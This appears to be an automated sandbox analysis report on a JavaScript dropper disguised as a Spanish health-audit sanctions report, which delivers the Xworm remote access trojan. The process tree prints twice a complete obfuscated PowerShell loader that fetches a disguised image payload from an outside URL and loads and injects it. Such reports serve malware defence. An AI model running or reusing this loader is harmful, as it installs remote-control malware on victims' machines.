Analysis

  • max time kernel
    136s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250619-en
  • resource tags

    arch:x64arch:x86image:win11-20250619-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02/07/2025, 18:52

General

  • Target

    NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js

  • Size

    19KB

  • MD5

    9f6c707c6678a8c0bf0d1fe1412b26a6

  • SHA1

    3c6425c1a5dbfe0a425ee46cc1a4b9a4f8fb8ed1

  • SHA256

    0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1

  • SHA512

    c8c469d76efbde71a296f7c59537b58475a6359e823ac6800e5bc0c1b1f6f442b665fd4d0401f55da8cc8426002d686ed7af6046a22ae38f6bbec173c3127b29

  • SSDEEP

    192:QTV70IM2f2BWAK/Mbk2B6BnLWlxj4eO05VG8IUZYDanl:0V1M2+M+bdYNc7v1IUyDo

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg

exe.dropper

https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:5116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
        3⤵
          PID:4060
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          3⤵
            PID:1428
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            3⤵
              PID:956
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
              3⤵
                PID:4948
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4552
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
            1⤵
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
              2⤵
              • Blocklisted process makes network request
              • Suspicious use of WriteProcessMemory
              PID:1412
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
                3⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1308
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5004

          Network

                MITRE ATT&CK Enterprise v16

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  8db89638d25eb835085ddae51b7df0ff

                  SHA1

                  6b06c8b024f2b5bbcb0ca2323aac080ca2b101dd

                  SHA256

                  b76abef376e058bbf246be196a0de223552b11bce715cf65f6073f678164de35

                  SHA512

                  64919bb2796afcd347264233053d7275c8171e544ce02313f21a77d26bdbfc5af0e9ab069cb256d1ce1996019c6fb320a5880bb4556ef0748ef3bf8dd17e05e8

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  7b5fe43dda2544ecf1948d765ad2a49a

                  SHA1

                  b9a52f5a2981e7dcc1046e91fd3f78e216bf9578

                  SHA256

                  5d441b6c6a153bed01c7e976a0f82e67e38f043f8b0296ae56a57024a7441830

                  SHA512

                  8146dc9526ebba7fcd7c8258759a6212cac27fc70afe1ddc712409d1af757cef4d7944aa2856962d8f05c0f569fe9b3e2302d7ca42d6f3f49d085b12ef46a926

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moyeartk.5o1.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Public\Downloads\agnosticism.js

                  Filesize

                  19KB

                  MD5

                  9b49b1a2e0327767db6dc4883654dd22

                  SHA1

                  486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba

                  SHA256

                  761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30

                  SHA512

                  b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206

                • memory/1620-15-0x0000021E8D0F0000-0x0000021E8D0FE000-memory.dmp

                  Filesize

                  56KB

                • memory/1620-9-0x0000021E8D6C0000-0x0000021E8D6E2000-memory.dmp

                  Filesize

                  136KB

                • memory/1620-13-0x0000021EA5860000-0x0000021EA5870000-memory.dmp

                  Filesize

                  64KB

                • memory/1620-14-0x0000021EAE370000-0x0000021EAE6EE000-memory.dmp

                  Filesize

                  3.5MB

                • memory/1620-0-0x0000021EA5860000-0x0000021EA5870000-memory.dmp

                  Filesize

                  64KB

                • memory/1620-11-0x0000021EA5860000-0x0000021EA5870000-memory.dmp

                  Filesize

                  64KB

                • memory/1620-20-0x0000021EA5860000-0x0000021EA5870000-memory.dmp

                  Filesize

                  64KB

                • memory/1620-12-0x0000021EA5860000-0x0000021EA5870000-memory.dmp

                  Filesize

                  64KB

                • memory/1620-10-0x0000021EA5860000-0x0000021EA5870000-memory.dmp

                  Filesize

                  64KB

                • memory/4552-23-0x0000000005790000-0x000000000582C000-memory.dmp

                  Filesize

                  624KB

                • memory/4552-19-0x0000000000400000-0x000000000040E000-memory.dmp

                  Filesize

                  56KB

                • memory/4552-34-0x0000000005DF0000-0x0000000005E56000-memory.dmp

                  Filesize

                  408KB

                • memory/4552-35-0x0000000006910000-0x00000000069A2000-memory.dmp

                  Filesize

                  584KB

                • memory/4552-36-0x0000000006F60000-0x0000000007506000-memory.dmp

                  Filesize

                  5.6MB